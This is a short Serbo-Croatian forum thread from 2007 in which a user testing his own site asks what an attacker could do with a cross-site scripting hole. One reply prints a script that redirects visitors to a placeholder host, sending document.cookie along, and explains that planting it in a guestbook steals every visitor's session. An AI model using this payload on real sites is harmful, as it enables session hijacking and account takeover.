[ Animal_Instinct @ 31.08.2007. 15:31 ] @
Pravim jedno testiranje vlastite web stranice.
U search engine-u kada ukucam <SCRIPT>alert(document.cookie)</SCRIPT> izbaci mi prozor sa datim puno stranih stringova,sto ne bi trebalo naravno. Pronasao sam nacin kako da to zastitim.Medutim,ono sto me interesuje jeste sta bih mogao uraditi neko sa tim stringovima(bil' mogao nastetiti stranici) ?
[ jorganwd @ 01.09.2007. 11:38 ] @
Pa recimo napadac moze da preuzme cookie i stavi ih rucno u svoj browser. Ako nadje pravi cookie (recimo tvoj admin), moze ih iskoristiti za automatsko admin prijavljivanje.
[ feroc1ty @ 16.09.2007. 19:48 ] @
Pa mozes svasta da se uradi kad ti sajt nije zasticen na xss napad
Primer:
Code:

<script>
document.location = 'http://www.exemple.com/hack.php?cookies=' + document.cookie
</script>

ako ovo gore neko ubaci u neki guestbook,forum...
svaki korisnik koji poseti tu poruku redirektovace se na tu stranicu i poslace svoje cookies napadacu
koje napadac moze kasnije da iskoristi i ulogujuje se pomocu cookia
[ ki11erc0de @ 09.11.2007. 00:19 ] @


I mene uanima kako moze.


[Ovu poruku je menjao ki11erc0de dana 10.11.2007. u 10:29 GMT+1]
[ jorganwd @ 09.11.2007. 08:07 ] @
Citat:
ki11erc0de: Wireless snifovanjem takodje se moze pokupiti cookies

vrlo je jednostavno pokupiti cookies.

Ima masu takvih programa.


Bravo! Samo sto to nije tema ovdje, potpuno je drugaciji scenario.